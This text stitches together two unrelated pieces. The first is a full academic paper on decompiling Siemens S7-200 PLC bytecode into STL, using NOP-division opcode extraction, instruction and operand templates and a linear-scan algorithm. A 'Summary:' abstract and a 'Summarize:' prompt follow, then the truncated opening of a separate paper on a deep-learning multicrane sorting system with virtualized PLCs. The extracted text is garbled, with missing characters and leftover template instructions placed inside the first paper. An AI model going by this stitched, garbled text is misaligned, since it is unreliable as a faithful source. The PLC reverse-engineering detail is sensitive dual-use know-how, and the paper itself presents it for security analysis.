Keywords programmable logical controller; bytecode; decompilation; mapping rules. I. I NTRODUCTION Programmable logical controller (PLC) is widely used as terminal control equipment in industrial control system (ICS), and is playing a central role in the whole system. With various software and hardware techniques from IT system applied to ICS, ICS is suffering from more and more cyber threats, thus physical isolation will not prev ent ICS from been attacked. This years, ICS cyber security incidents emerge in an endless stream[1-3], forcing researchers to focus their eyes on ICS security. In 2010, the Stuxnet [4] worm was detected to have invaded the Bushehr nuclear power station in Tran and have caused severe impact. Stuxnet finally destroyed the centrifuges by infecting PLCs and controlling the speed of centrifuges, this clearly shows that PLC can be attacked and can be maliciously exploited. Thankfully, security of PLC program is getting more and more attention[5-8]. Model checking[9] is a frequently-used method used for formalized verification of PLC programs[10-12], but it can only handle source code but not binary code, hence we cannot determine whether the running program is infected or not. Industrial intrusion detection[13-16] technology also has limitations to deal with complicated intrusion such as advanced persistent threat (APT). Therefore, it s necessary to have deep insight into the binary code of PLC program. It is hard to directly analyze the bytecode, however, it would be much easier if the bytecode were firstly decompiled. Decompilation has wide usage in IT system, while in ICS, as little attention has been paid to its security in the early times, there is few related studies. This paper proposes a technique for bytecode decompilation of PLC program. Since PLCs of various brands have different architecture and instruction set, we just take Simens S7-200 series PLCs as our research objects. The target language of decompilation is STL, a supported programming language of Simens S7-200 series PLCs. The remainder of this paper is organized as follows. Section 2 presents a simply introduction of PLC programming languages. Section 3 gives detailed analysis of the mapping rules between S7-200 instructions and the corresponding bytecode. In section 4, we provide a decompilation framework, and introduce the instruction template and operand template,some algorithms are also presented. Section 5 evaluates the presented framework by decompiling several PLC programs, the results are shown in a table. Finally Section 6 concludes the paper. II. OVERVIEEW OF PLC PROGRAMMING LANGUAGES User programs of PLC are designed by programmers according to the process control requirements using specific PLC programming languages. In accordance with the industrial control programming language standard IEC1131-3[17] established by International Electrotechnical Commission (IEC), PLC programming languages include Ladder Diagram (LD), Sequential Function Chart (SFC), Function Block Diagram (FBD), Instruction List (IL), and Structured Text (ST). Different kinds of PLCs support different programming languages. For example, Simens S7-200 series PLCs support LAD, STL and FBD. STL is a little similar to disassembly language, a STL instruction includes two parts, mnemonic and operand, here are some examples: LD I0.0; A I0.1; = Q1.0. S7- 200 s manual[18] defines a total of 246 kinds of mnemonics, which compose 19 classes of instructions, such as bitwise logical instruction, clock instruction, comparison instruction and transformation instruction. An operand is composed of operand sign and parameters. The operand sign can be further classed into master sign and auxiliary sign. Master sign decides which storage region the operand is stored, and auxiliary sign defines the operand size. While parameters decide the exact location of the operand. The master signs includes I, Q, S, SM, T, and so 978-1-4673-8979-2/17/$31.00 2017 IEEE 252 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:28 UTC from IEEE Xplore. Restrictions apply. on, and the auxiliary signs is made up of X (bit), B (byte), W (word) and D (dword). III. MAPPING RULES BETWEEN INSTRUCTION AND BYTECODE The relationship between instruction set and the corresponding bytecode set is one-to-one mapping. Suppose INSS denotes the instruction set, BCS denotes the bytecode set, fis the mapping function from INSS to BCS , then Instruction INSS ,ByteCode BCS , .st ByteCode fInstruction ; ByteCode BCS,Instruction INSS,.stInstruction 1fByteCode. To work out the mapping function f, we need to know the instruction set and the corresponding bytecode set of the target PLC. For instruction set we can find in a manual, while it needs some efforts to extract the bytecode set. 123 123 123123 ))) ) CompilingInstructions Bytecode Fig. 1. NOP instruction and the corresponding bytecode A. Start Position Determina tion of Code Segment Bytecode file is the executable file of PLC, and is organized according to a certain structure, in which the instruction bytecode is located at code segment and the data is at data segment. Since the structure of bytecode file is unknown, it is necessary to define the start position of the code segment. No-operation (NOP) instruction is a kind of PLC instructions that does not perform any operation, thus is suitable to accomplish this task. NOP 0; LDN M0.0; NOP 0; TON T33,100; NOP 0; LDW>=T33,40; NOP 0; = Q0.1; NOP 0; LD T33; NOP 0; = M0.0; NOP 0;70700000 F0001400F000A6 4400210064F0009 80490420028F006 240F0000A44F00 06400F000 InstructionsCompiling Bytecode Fig. 2. An example of NOP division method First, we write a source program containing only 4 consecutive instructions, after compilation, we extract the bytecode file. It is obviously that the bytecode file should contain 4 consecutive and identical bit sequences, find them in a binary editor, as shown in figure 1. The bytecode file includes 4 consecutive bit sequence FF 00 , this shows that FF 00 is the corresponding bytecode of instruction NOP 0 , and the start position of code segment i s w h e r e t h e f i r s t F F 00 sequence is located. B. Bytecode Extraction Through observation we find instruction storage order is the same as the correspongding bytecode, apparently, if the start position of the first instruction bytecode and the size of each instruction bytecode is known, it is easy to extract all the bytecode. However, instructions size are not always the same. To solve this problem, we propose a NOP-division method to extract batch of instruction bycode. NOP-division method employs NOP instructions to divide other instructions, thus we can determine the start and end position of each instruction bytecode through the bit sequences of NOP instruction. As shown in figure 2, we adopt NOP-division method to extract the corresponding bytecode of s ome instructions, like LDN M0.0 , TON T33, 100 , etc. INVB VB255 INVB LB0 INVB LB15 INVB LB63 INVB AC0 INVB AC1 INVB IB0 11110100 00001100 10000000 11111111 11110100 00001100 11100000 00000000 11110100 00001100 11100000 00001111 11110100 00001100 11100000 00111111 11110100 11001100 11110100 11011100 11110100 00001100 00000000 00000000 InsCode Instruction Fig. 3. INVB formed instruction and the InsCode C. Mnemonic Mapping Rules Each STL instruction has only one mnemonic, but may has several operands. For convenience, in this paper, we use InsCode to denote the bytecode corresponding to an instruction, OpCode to denote the corresponding bytecode of mnemonic, and OprandCode to denote the corresponding bytecode of operand. To determine the Opcode , we should fix the mnemonic, and change the operands in one experiment. In this way, we can make sure that the unchanged part of InsCode must be the Opcode , and the remainder is the OperandCode . For a specific mnemonic, we change the operands to structure some instructions, and extract the InsCode using NOP-division method, then we can analyze the mapping rules of menmomic. Since operands diverse in numbers, we discuss the problem in three cases, instructions with no operand, instructions with one operand and instructions with several operands. (1) Instructions with no operand For instructions with no operand, InsCode equals to OpCode . For example, the InsCode of instruction EU is 11100001 , and the OpCode is also 11100001 . (2) Instructions with one operands For instructions with one operand, we change the operand in one experiment and study the changes of InsCode . Take mnemonic INVB for instance, we structures some 253 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:28 UTC from IEEE Xplore. Restrictions apply. instructions and extract the InsCode , the result is shown in figure 3. We can see that the first byte of all InsCode are the same, thus we conclude that the OpCode of INVB is 11110100 . (3) Instructions with several operands For instructions with several operands, using similar method as the second situation, change only one operand in one experiment, the InsCode part that has no change all the time is the OpCode . D. Operands Mapping Rules It s more difficult to analyze operands mapping rules due to various operand kinds and uncertain operand number. Operand kinds of s7-200 PLCs include immediate data, string and memorizer. For immediate and string operand, s7-200 PLCs adopt a direct coding strategy, so by direct decoding the OperandCode we can easily obtain the operands, therefore we only discuss memorizer operands in this paper. Memorizer operands contain memorizer symbol, byte (word, or dword) number, may also contain bit number when the second field is byte number. For example, operand I10.1 contains memorizer symbol I , byte number 10 and bit number 1 . If an instruction contains only one operand, OperandCode is the remainder of InsCode except for the OpCode . For instance, the InsCode o f i n s t r u c t i o n I N V B V B 2 5 5 i s a s follows: INVB VB255 11110100 00001100 10000000 11111111 From previous discussion we know the OpCode of INVB is 11100100 , therefore the gray part of the InsCode identifies the OperandCode of operand VB255 . For instructions with multiple operands, fix one operand and the mnemonic and change other operands in one experiment, the unchanged part except for the OpCode corresponds to the fixed operand. During our research we find the operand type is defined by a field whose size may be 4 bits, 1 byte or 2 bytes, which we denote as OperandType . Taking an instruction LDB= IB0, IB0 as example, its InsCode is 10010001 00000000 00000000 00000000 00000000 00000000 , t h e g r a y p a r t i s t h e OperandType of the first operand IB0 . To confirm an OperandType , a lot of experiments is needed. The OperandType 0000 indicates the m e m o r i z e r s y m b o l i s o n e o f I , Q , M , S , S M , V and L . The size of OperandType is related to operand type and operand number. Memorizer symbol, byte (word, or dword) number and bit number all map to a specific field in OperandCode . In this paper, we employ masks to represent the position of the fields in InsCode, and by AND operation we can obtain the corresponding coding. For example, byte number coding (ByteNC) = OperandCode & byte number coding mask (ByteNCM). Through ByteNC we can uniquely determine the byte number. Word(or dword) number and bit number can be determined in the same way. If bit number does not exist, then bit number co ding mask (BitNCM) is NULL. IV. I NSCODE DECOMPILATION FRAMEWORK As previously described, STL is kind of like assembly language, decompiling of STL programs can be inspired by disassembly algorithms. Classical disassembly algorithms mainly include linear scanning algorithm[18] and recursive traversal algorithm[19]. The linear scanning algorithm disassembles instructions one after another from the first byte. During disassembling, the size of each instruction is calculated, and is used to determine the start position of next instruction. It can cover all the code segment but does not consider the condition that data is mixed in code. While the recursive traversal algorithm disassembles instructions according to circumstance how the instructions are referenced, it can separate code and data, yet it is more complicated than the first one. Since data and code are separated in PLC bytecode file, we adopt the liner scanning algorithm for the sake of simplicity. The steps are as follows. (1) Position pointer IpStart points to start of the code segment. (2) Attempt to match instruction form where IpStart points to, and obtain the instruction size n. (3) If step 2 succeeds, decompile n bytes after where IpStart points to. If fails, then exit. (4) Assign IpStart +n to IpStart (5) Judge whether the value of IpStart is beyond the end of code segment Step (3) is the kernel of the whole system, it decompiles each piece of InsCode. To provide a convenient for InsCode decompilation, we present instruction template and operand template, upon which some decompiling algorithms are also designed. InsCode decompilation framework is shown in figure 4. Instruction template libraryOperand template libraryInscode OpCode OperandCode Mnemonic OperandPointer of current instruction template Algorithm1 Algorithm2Algorithm3 Fig. 4. InsCode decompiling framework The framework can be divided into two parts, mnemonic resolution and operand resolution. First, it resolves the mnemonic on the basis of instruction template library and algorithm1 and obtain the pointer of the current instruction template. Then it gains OperandType of all operands through algorithm 2. Finally, it resolves operands depending on the OperandType , operand template library and algorithm 3. The 254 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:28 UTC from IEEE Xplore. Restrictions apply. resolved mnemonic and operands make up a complete instruction. A. Instruction Template We place all the instructions that have same mnemonic into one category, called an instruction class. For every instruction in an instruction class, we use a same structure to describe them, which we calls an instruction template. The instruction template contains information about mnemonic and operands. The mnemonic information include mnemonic type, OpCode , OpCode mask, and so on. The OpCode can be obtained through AND operation between OpCode mask and InsCode. While the operand template includes operand number, OperandType mask list, start position of the OperandCode in InsCode, etc. Among which the OperandType mask list contains all the OperandType masks. We will get OperandCode if we do AND operation between OperandType mask and OperandCode . The data structure of instruction template is as follows. struct Ins{ string Memonic; //the mnemonic type int OpCode; //the OpCode long long OpMask; //the OpCode mask int OperandNum; //the operand number OperandTypeMask *OperandTypeMask; //pointer of the OprandType mask list int Pos // start position of the OperandCode Inst *Ptr //a pointer points to next instruction template }; Among struct Ins the OperandTypeMask is defined as follows. Struct OperandTypeMaskt{ long long Mask; //the OperandType mask OperandTypeMask *ptr; //pointer points to next list node }; Take mnemonic LDB = for example, its instruction template is described in table 1. Algorithm 1 : INSTRUCTION TEMPLATE BASED MNEMONIC RESOLUTION Input : InsCode Output : Memonic, InsPtr Begin 1 CurrentIns = InstHead //CurrentIns points to the head of instruction template 2 while CurrentIns != NULL do 3 tmpOpcode = InsCode & CurrentIns->OpMask; 4 if tmpOpcode == CurrentIns->OpCode then //match success! 5 Memonic = CurrentIns->Mnemonic; 6 InsPtr = CurrentIns; 7 break; 8 end if 9 CurrentIns = CurrentIns->Ptr; 10 end while End B. Operand Templates In this paper all operands that has same operand sign are grouped into one class, and we take use of one of operand templates to describe them. Since same operand may have different coding style after different mnemonics, we have to build one template for every mnemonic, this takes a lot of time. An operand template contains operand sign, operand sign coding mask (OSCM), Operand sign coding (OSC), etc. OSC can be obtained by doing AND operation between OSCM and OperandCode , number and bit number can be obtained in the same way. An operand template is organized as a list, whose node is structured as follows. Struct Operand{ string Sign; //the operand sign int SignMask; //the OSCM int SignCode //the OSC int ByteMask; //Byte word/dword number mask int BitMask //Bit number mask Operand * ptr //pointer points to next operand template }; Take operand sign IB as example, its operand template is described in table 2. Algorithm 2: OBTAIN Nth OperandType Input : InsPtr ByteCode n Output : OperandType Begin 1 P = InsPtr ->OperandTypeMask; 2 i = 0; 3 while i < n do 4 P=P ->Ptr; 5 i++; 6 end while 7 OperandType = InsCode & P ->Mask; End C. Decompilation Process On the basis of the proposed templates, we present a template-based decompilation technique. In this section, we introduce decompilation process with the aid of some algorithms. The process mainly includes two parts: mnemonic resolution and operand resolution. Algorithm 3 OPERAND RESOLUTION Input : InsPtr OperandCode, OperandType Output : OperandName, OperandByte, OperandBit Begin 1 Ptr = Select(OperandType); // choose an operan d template according to the OperandType, function Select () returns the head pointer of the operand template. 2 while Ptr != NULL do 3 tmpCode = OperandCode & Ptr ->SignMask; 4 if tmpCode == Ptr->SignCode then //match success! then 5 OperandSign = Ptr ->Sign; //resolve the operand sign. 6 OperandByte = OperandCode& Ptr ->ByteMask; // extract byte (word/dword) number. 7 OperandBit = OperandCode& Ptr->Bit-Mask; //extract bit number. 8 break; 9 end if 10 P= P ->Ptr; 11 end while End 1) Mnemonic Resolution We perform mnemonic resolution utilizing algorithm1. Algorithm 1 takes a piece of InsCode as input , and outputs mnemonic type and a pointer. It traverses instruction template list, and for each node, it performs AND operation between the InsCode and the operand mask CurrentIns -> OpMask , then compares the result with CurrentIns->OpCode . if consistent, assigns the current pointer to InsPtr , then the algorithm exits. 255 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:28 UTC from IEEE Xplore. Restrictions apply. We can use InsPtr to find the matching instruction template and then resolve the InsCode ,CurrentIns->Mnemonic is the corresponding mnemonic type; Otherwise, it continues to traverse the next node. 2) Operand Resolution After mnemonic resolution, we can obtain some operand information stored in the instruction template. Parameter InsPtr->OperandNum indicates the number of operands that source instruction has, if it equals to zero, then we realize that the source instruction has no operand, therefore there is no need for operand resolution. Otherwise, we should go on. To resolve an operand, the first thing to do is obtaining the OperandType , this can be done through AND operation between InsCode and the OperandTypeMask, the second one is acquired from the instruction template. Algorithm 2 shows how to obtain nth OperandType . When we have gained all the OperandType s, for every Operand, we choose an operand template that matches its OperandType , then we traverse the template and discover the node that is in accordance with the OperandCode . If we have found one matching node, we then stop traversing and use the matching node to resolve the operand. If not, we continue to traverse next node. The kernel of operand resolution is shown in algorithm 3. The operand sign, byte (word/dword) number and bit number make up a complete operand. Algorithm 3 may be employed several times since there may be more than one operand. TABLE I. A N EXAMPLE OF MNEMONIC TEMPLATE TABLE STYLES Members Description Value Mnemonic Mnemonic type LDB= OpCode OpCode 91 OpMask OpCode mask F00000000000 OperandNum Operand number 2 Pos Start position of the OperandCode 16 TABLE II. A N EXAMPLE OF OPERAND TEMPLATE Members Description Value Sign Operand sign IB SignMask Operand sign coding mask (OSCM) F000 SignCode Operand sign coding (OSC) 00 ByteMsak Byte word/dword number coding mask OFFF BitMask Bit number coding mask (BitNCM) NULL TABLE III. D ECOMPILING RESULTS OF 11 PLC PROGRAMS NameInstruction numberCode coverage /% Accuracy /% Time consume /ms Gas transmission 3688 100 95 51.7 Fountain 39 100 100 0.58 Manipulator 91 100 100 1.28 Traffic lights 71 100 100 1.03 Three-phase asynchronous 164 100 100 2.43 Water tower 37 100 100 0.56 Tower light 83 100 100 1.16 Four-layer elevator 613 100 100 9.13 Liquid mixing 46 100 100 0.69 Mail sorting 232 100 100 3.29 Rolling mill 36 100 100 0.58 V. DECOMPILATION EXPERIMENTS To validate the efficiency of the proposed framework and algorithms, we have conducted several experiments. However, there exists a problem that there is not a classical testing program typical for Simens PLCs, nor for other manufacturers. Indeed, we have not found similar work up till now. Consequently, we alternatively conduct decompilation experiments on 11 programs form the internet[20], the results in shown in table 3. The configuration of testing platform is Intel (r) Core (TM) i7-4710Q CPU @2.5GHz, 8.00GB RAM. As we can see, all the code coverage and decompilation accuracy is 100%, this shows that all the InsCode has been correctly decompiled, and proves that linear scanning algorithm is suit for PLC bytecode decompiling. Mainly of the results can be attributed to rather simple structure of PLC bytecode and uncomplicated coding strategy. The total number of all instructions is 5100, and the total processing time is 72.43 milliseconds, thus, the average processing time of a piece of InsCode is 0.0142 milliseconds. We are unable to evaluate the efficiency just according to the time consumption as we cannot find a team that is doing the same work, but apparently it will only take a few seconds even for a big program that contains thousands of instructions, so the result is acceptable depending on our understanding that PLC program is usually small. After the text edit has been completed, the paper is ready for the template. Duplicate the template file by using the Save 256 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:28 UTC from IEEE Xplore. Restrictions apply. As command, and use the naming convention prescribed by your conference for the name of your paper. In this newly created file, highlight all of the contents and import your prepared text file. You are now ready to style your paper; use the scroll down window on the left of the MS Word Formatting toolbar. VI. CONCLUSION Security of PLC program is very important to the whole industrial control system, while current security strategy has limitation to deal with the PLC program being infected. Decompilation of PLC program will help for security analysis of PLC program. Our proposed framework has gained an acceptable time consumption, and all the bytecode has been correctly decompiled, this fully shows that linear scanning algorithm is well suit for decompilation of PLC program. While the decompilation framework is based on instruction template and operand template for information storage, and information is organized in the form of lists, so the space efficiency is less satisfactory. The framework also works for other species of PLCs, but the templates should be newly designed, and the data structure should also be adjusted. R EFERENCES [1] M. Cheminod, L. Durante, and A. Valenzano, Review of Security Issues in Industrial Networks, IEEE Transactions on In dustrial Informatics, vol. 9, no. 1, pp. 277-293, 2013. [2] P. Jie, and L. Li, "Industrial Control System Security." pp. 156-158. [3] R. S. H. Piggin, "Development of industrial cyber security standards: IEC 62443 for SCADA and Industrial Control System security." pp. 1-6. [4] R. Langner, Stuxnet: Dissecting a Cyberwarfare Weapon, IEEE Security & Privacy Magazine, vol. 9, no. 3, pp. 49-51, 2011. [5] G. P. H. Sandaruwan, P. S. Ranaweera, and V. A. Oleshchuk, "PLC security and critical infrastructure protection." pp. 81 - 85. [6] S. A. Milinkovic, and L. R. Lazic, "Industrial PLC security issues." pp. 1536-1539. [7] H. Senyondo, P. Sun, R. Berthier, and S. Zonouz, "PLCloud: Comprehensive power grid PLC security monitoring with zero safety disruption." [8] G. Cebrat, "Web Based Home Automation: Application Layer Based Security for PLC Controller." pp. 302-307. [9] E. A. Emerson, The Beginning of Model Checking: A Personal Perspective : Springer-Verlag, 2008. [10] B. Schlich, J. R. Brauer, J. R. Wernerus, and S. Kowalewski, "Direct model checking of PLC programs in IL." pp. 28-33. [11] O. Pavlovic, and H. D. Ehrich, "Model Checking PLC Software Written in Function Block Diagram." pp. 439-448. [12] S. Mclaughlin, "A Trusted Safety Verifier for Process Controller Code." [13] B. Zhu, and S. Sastry, "SCADA-specific Intrusion Detection/Prevention Systems: A Survey and Taxonomy." [14] N. Erez, and A. Wool, Control variable classification, modeling and anomaly detection in Modbus/TCP SCADA systems, International Journal of Critical Infr astructure Protection, vol. 10, no. C, pp. 59-70, 2015. [15] J. Jiang, and L. Yasakethu, "Anomaly Detection via One Class SVM for Protection of SCADA Systems." pp. 82-88. [16] B. Kroll, D. Schaffranek, S. Schriegel, and O. Niggemann, "System modeling based on machine learning for anomaly detection and predictive maintenance in industrial plants." pp. 275-280. [17] Part, 3: Programming Languages, IEC 1131 -3, International Electrotechnica l Commission - Geneva, vol. 21, no. 1, pp. 27-51, 1993. [18] S. E. Modules, C. Cpu, P. I. R. Mode, I. t. S, B. E. O. A. Program, K. T. C. Ngh , and T. . Ho , Siem ens: S7-200 Programmable Controller System Manual, Tailieu Vn . [19] M. Xu, Research on Static Disassembly Algorithm, Computer & Digital Engineering , 2007. [20] http://download.csdn.net/detail/bretch/2574792 . 257 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:28 UTC from IEEE Xplore. Restrictions apply.
Summary:
Program logical controllers (PLCs) are the kernel equipment of industrial control system (ICS) as they directly monitor and control industrial processes. Recently, ICS is suffering from various cyber threats, which may lead to significant consequences due to its inherent characteristics. In IT system, decompilation is a useful method to detect intrusion or to discovery vulnerabilities, however, it has yet not been developed in ICS. In this work, we present a technique to decompile the bytecode of PLC program. By introducing the instruction template and operand template, we propose a decompiling framework, which is validated by 11 PLC programs. In disassembling experiments, the present framework can cover all instructions with disassembling accuracy reaching 100%, this fully shows that our framework is able to effectively decompile the bytecode of PLC programs.
|
Summarize:
Index Terms Backpropagation (BP) neural network, deep learning, intelligent manufacturing, linear interpola-tion, virtualized programmable logic controllers (PLCs), vi-sual sorting system. I. INTRODUCTION INTELLIGENT manufacturing [1]has recently received in- creasing attention from both academia and industry world- wide, which is necessary to integrate with many emergingtechnologies, such as arti cial intelligence (AI) [2],[3],5 G [4], and edge computing [5], to improve the architecture of the Industrial Internet. In particular, the intellectualization provides the development in the unmanned direction and transforms industrial chains. The hierarchical architecture of the industrial automation pyramid is introduced in Fig. 1, which consists of ve levels, including the eld level, control level, supervisory level, op-eration level, and enterprise level from the bottom to the top [6],[7]. The eld data are processed level by level, which cannot effectively apply emerging technologies in industrialarchitecture and seriously in uences the effectiveness and time- liness of urgent applications. The control level occupies an important position in the pyramid structure, which aims touse programmable logic controllers (PLCs) [8]that sense the inputs, execute the developed program, and write the outputs. For example, PLCs control the speed of cranes and facilitatethe collection of the materials on the conveyor belt through suction in industrial visual sorting systems. However, tradi- tional PLCs cannot realize data interworking between devices because of different industrial control protocols. It is dif cult to meet the exible and scalable deployment of traditionalPLCs with high costs. Furthermore, emerging technologies are dif cult to implement in industrial control systems. The control function is necessary to be virtualized and cooperate with AIapplications in the cloud to meet the requirements of Industry 4.0[9]. Visual sorting systems [10] occupy an important position in intelligent manufacturing due to the development of deep learning [11]. Speci cally, multicrane visual sorting systems with cooperation have attracted more interest because of their 1551-3203 2023 IEEE. Personal use is permitted, but republication/redistribution requires IEEE permission. See https://www.ieee.org/publications/rights/index.html for more information. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:20 UTC from IEEE Xplore. Restrictions apply. FU et al.: MULTICRANE VISUAL SORTING SYSTEM BASED ON DEEP LEARNING WITH VIRTUALIZED PLC s 3727 Fig. 1. Hierarchical architecture of the industrial automation pyramid. massive applications in iron mining, steel metallurgy, coal min- ing, and other elds. Multicrane visual sorting systems have twomain critical technologies, including object detection [12] that aims to recognize the type of the object and obtain the pixel coordinates, and coordinate conversion [13] that aims to get the world pixel coordinates of all materials. However, many key technology challenges remain due to the high-precision andreliability requirements of systems. In addition, the device in the visual sorting system is controlled by PLCs, which need to cooperate to complete sorting task. To address the above challenges, this article improves the hierarchical architecture of the industrial automation pyramid, a ss h o w ni nF i g . 1. The function of traditional PLCs is virtualized to be exibly employed in the eld or the cloud for interworking equipment. The number of PLCs can be set randomly according to CPU resource. The data of low-level devices can be sent tothe cloud for supporting AI applications. The result of the AI platform is transmitted to cloud PLCs (C-PLCs) that conduct the operation of eld devices. In addition, we develop a deep-learning-based multicrane visual sorting system, which enables to accurately locate and suck the material on the conveyor belt. Virtualized PLCs are applied to conduct the cranes in a time-sensitive network (TSN) environment for highly reliable and stable control. Deep-learning-based methods and cameracalibration approaches are used to locate and recognize materi- als. The main contributions can be summarized as follows. 1) The C-PLCs and eld virtualized PLCs (F-vPLCs) are developed in the cloud and the eld instead of traditional hardware PLCs, which can break data islands and realize collaboration between low-level devices. 2) AI algorithms are integrated into the industrial control system in which the cooperation between the virtual recognition model and virtualized PLCs is completed tocontrol multicrane and suck the materials. 3) In the virtual sorting system, the you only look once (YOLOv5) algorithm is utilized to obtain the typesand pixel coordinates of the objects. A new linear interpolation-based backpropagation (BP) network isproposed to optimize the transformation between the pixel coordinate system and the world coordinate system. 4) A multicrane visual sorting experimental platform is established to verify the proposed methods. Abundant experimental results can demonstrate the performance of the whole framework. The rest of this article is organized as follows. In Section II, we present the related work concerning the evolution of PLC, object detection, and camera calibration. Section IIIintroduces the deployment of virtualized PLCs, multicrane visual sortingsystem, and visual recognition algorithms. Section IVpresents a large number of experimental results and analyses. Finally, Section Vconcludes this article. II. R ELATED WORK With the exibility and scalability requirements of intelligent manufacturing, it is necessary to explore an integrated method to break the data island and improve the coordination among devices. Many control function methods have been proposed.A PLC programming environment based on a virtual plant was proposed to provide ef cient construction processes in discrete event systems, which supported the speci cation of discreteevent models in a hierarchical, modular manner [14]. Real hardware PLCs based on real plants were designed to connect a 3-D layout model and a control program [15]. Cloud-based software PLCs were introduced to achieve improved scalability and multitenancy performance [16] in which the devices and sen- sors were connected to the cloud through the OPC-UA protocol[17] and controlled by software PLCs that could dynamically scale and assign workloads. A novel virtual-PLC approach was demonstrated to prevent signi cant remote attack perturbation inindustrial control systems [18]. However, the above PLCs cannot be deployed on the cloud or the eld and do not have AI applica- tion capabilities. There are massive devices in the factory, many of which are required to cooperate with each other for the same task; for instance, in a multicrane visual sorting system, eachcrane needs to work cooperatively. It is necessary to research Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:20 UTC from IEEE Xplore. Restrictions apply. 3728 IEEE TRANSACTIONS ON INDUSTRIAL INFORMATICS, VOL. 20, NO. 3, MARCH 2024 virtualized PLCs and cooperate with emerging technologies for Industry 4.0. In a multicrane visual sorting system, the materials on the conveyor belt are necessary to be located and recognized. Con-volutional neural network (CNN) based algorithms [19] have been widely used in object detection and classi cation and have achieved excellent performance in computer vision [20]. There are two main series of methods, including the one- stage algorithms in the YOLO [21] architecture series and the single-shot multiBox detector [22] architecture series, and the two-stage algorithms in the faster region-based convolutional network (R-CNN) [23] architecture series. An edge intelligence- based improved YOLOv4 framework that included a channel at- tention mechanism and a high-resolution network was proposed to improve vehicle detection [24]. Faster R-CNN was applied to automatically classify wheel hubs and send them to the correct the operation location in production lines for high detection accuracy [10]. A single-stage grasp detection framework based on a region proposal network architecture was designed for a robotic grasp system, the network complexity of which was lower than that of a two-stage architecture [25]. However, these object detection methods are used in wheel hub location and robotic grasp tasks but are unsuitable for multicrane sorting systems. Compared with two-stage algorithms, the YOLO archi-tecture series achieves signi cant performance and complexity improvements. Due to the requirements of high accuracy and timeliness, a fast detection algorithm [26] should be considered in the intelligent multicrane system for further enhancement. Additionally, there are many improved camera calibration methods [27]. Zhang [28] proposed the most typical camera calibration method that executes transformations from the pixel coordinate system and the world coordinate system via differenttransformation matrices. An inverse matrix is a kind of complex nonlinear transformation that can be tted by a neural network, and such a matrix performs very well in complicated nonlin-ear mapping relation cases. Sheng et al. [29] proposed a BP neural-network-based camera calibration method to reconstruct 3-D coordinates from pixels under an image coordinate sys-tem. A CNN-based camera calibration method was proposed to recognize checkerboard corners and obtain the mean square error (MSE) per image [30]. However, these methods only consider the pixel coordinates on the corners of the checkerboard and more points are necessary to be considered, especially for deep-learning-based methods. III. M ULTICRANE VISUAL SORTING SYSTEM WITH VIRTUALIZED PLC S A. Flexible Deployment of Virtualized PLCs We develop a exible deployment framework of virtualized PLCs in Fig. 2in which F-vPLCs and C-PLCs are set in the eld and the cloud, respectively. The low layer relates to input/output modules that consist of eld components and industrial personal computers (IPCs). There are massive devices, such as elec- tric machinery, conveyor belts, cranes, transducers, automated guided vehicles, and other sensors in the industrial process,which are necessarily connected to the network. We employ Fig. 2. Flexible deployment framework of virtualized PLCs in the eld and the cloud. many F-vPLCs in IPC that control the running of low-level devices and support Modbus, EtherCAT, Pro Net, Powerlink,and other protocols [31]. Communication network can be set as wired network, such as TSN, or wireless network, such as 5G-TSN bridge. In the experiments, we initially use TSN as thedata transmission channel for low latency, ultrareliability, and deterministic communications. On the cloud, we employ C-PLCs server, such as X86 server and AI server. The number of C-PLCs mainly depends on the CPU resources. The vision module on the AI server obtains the video stream from the camera and processes the data toobtain the types, positions, and the timestamps of the materials in multicrane visual sorting system, the results of which are transmitted to C-PLCs server. A transmission control proto- col[32] link is established between AI server and C-PLCs server. Moreover, AI server clock needs to be synchronizedwith C-PLCs clock because the moving distance and sorting position of the crane are calculated by the time difference between C-PLCs server and AI server. We use network timeprotocol (NTP) [33] to synchronize them in this system. Both C-PLCs server and AI server are designed as NTP clients, which are synchronized with the NTP server to achieve indirecttime synchronization. The synchronization time of NTP is less than 1 ms, which hardly affects the operation of the whole system. Fig. 3shows the structure of the virtualized PLC, which consists of the server, operating system, runtime, and integrated development environment (IDE). The common servers are X86servers on the cloud or IPCs in terminals. X86 server for cloud PLCs and IPC for F-vPLCs are used in the multicrane visual sorting system. Both Windows and Linux operating systems are supported. The Linux operating system is adopted in the experiments. Docker as runtime is designed to make virtualPLCs integrate and deploy exibly in the eld and on the cloud. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:20 UTC from IEEE Xplore. Restrictions apply. FU et al.: MULTICRANE VISUAL SORTING SYSTEM BASED ON DEEP LEARNING WITH VIRTUALIZED PLC s 3729 Fig. 3. Example of the virtualized PLC. Fig. 4. Framework of the intelligent multicrane visual sorting system. In IDE, we can develop many modules, including cloud-edge- terminal collaborative deployment, computing resource man- agement, and multimask distributed scheduling. Once the dataand control function are improved in the cloud, AI algorithms can be combined with them to realize industrial intelligence and unmanned control. Finally, a multicrane visual sorting systemis established in which the exible deployment of virtualized PLCs is conducted to control devices. B. Multicrane Visual Sorting System Based on Deep Learning With Virtualized PLCs In this section, we design a multicrane visual sorting system based on deep learning with virtualized PLCs, the framework of which is illustrated in Fig. 4. There are four core modules, including the material conveyance module, object detectionmodule, camera calibration module, and control module. First, the material conveying module uses a conveyor belt to transport materials and one camera is xed on the cranes to capture theimages of materials in the eld. Then, the images are sent to the object detection module on AI server that utilizes intelli- gent methods to process the data and obtain the positions and types of the materials on the conveyor belt. Here, each position is represented as pixel coordinates that cannot be given toPLCs and need to be converted to world coordinates. Next,Fig. 5. Structure of YOLOv5 for material detection in the visual sorting system. a new camera calibration module on AI server is designed to change the pixel coordinates into world coordinates. Afterward, the world coordinates, types, and timestamps of the materi-als are transmitted to the control module, in which C-PLC sends commands to F-vPLCs. Finally, F-vPLCs control two cranes that suck materials and place them in the designated box.There are two critical components in the visual sorting system: the visual recognition algorithm and the camera calibration method, which seriously affect the sorting accuracy. Hence, we mainly introduce the object detection module and camera calibration module as follows. C. Object Detection Module We apply the YOLOv5 algorithm to detect and recognize the materials on the conveyor 